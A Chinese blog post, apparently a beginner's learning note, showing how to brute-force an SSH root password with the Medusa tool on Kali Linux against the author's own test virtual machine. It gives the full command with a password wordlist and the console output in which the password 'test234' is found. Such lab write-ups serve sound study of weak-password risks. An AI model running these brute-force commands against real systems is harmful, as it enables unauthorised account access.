欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

使用kali破解linux登录密码

程序员文章站 2022-04-12 08:31:42
一直想学好安全方面的知识,但苦于没门路,所以才开博,目的是记录自己学习的东西,同时也会以后学习这方面东西的兄弟提供些可参照物       &nbs...
一直想学好安全方面的知识,但苦于没门路,所以才开博,目的是记录自己学习的东西,同时也会以后学习这方面东西的兄弟提供些可参照物

 

         kali是啥就没必要介绍了,里面有大量的安全工具,基本搞安全的兄弟对这玩意或多或少都有接触,在kaili里用于破解ssh登录密码的工具,比较常用的就是medusa,打开控制台,直接输入 :medusa就会跳出这个工具的使用帮助:

 

      上面的语法提示告知了这个工具的使用方法,我在本地搭建了测试环境,并制作了自己破解常用的字典,破解步骤如下:

 

      Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

 

      在本次破解,使用的破解语句:medusa -h 192.168.171.135 -u root -P test.txt  -M ssh

 

      破解 的含义也不复杂:破解的目标是192.168.171.135  用户名是root,如果不知道用户名,可以用-U,里面保护一堆用户名字典,这样破解的速度会增加,毕竟会不断的去匹配用户名和密码,密码字典是test.txt,破解的功能是ssh

 

      执行破解就好了:

 

 

root@kali:~# medusa -h 192.168.171.130 -u root -P Desktop/text.txt -M ssh
Medusa v2.0 [https://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (1 of 10 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 10 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (3 of 10 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: test234 (4 of 10 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.171.130 User: root Password: test234[SUCCESS]
root@kali:~#

 

        这里出了点儿偏差:我的ip地址改了,因为我虚拟机里没装ssh。。。抱歉。。上面就测出登录密码了       

 

 

很多事儿,上帝安排好了,凭着直觉去日吧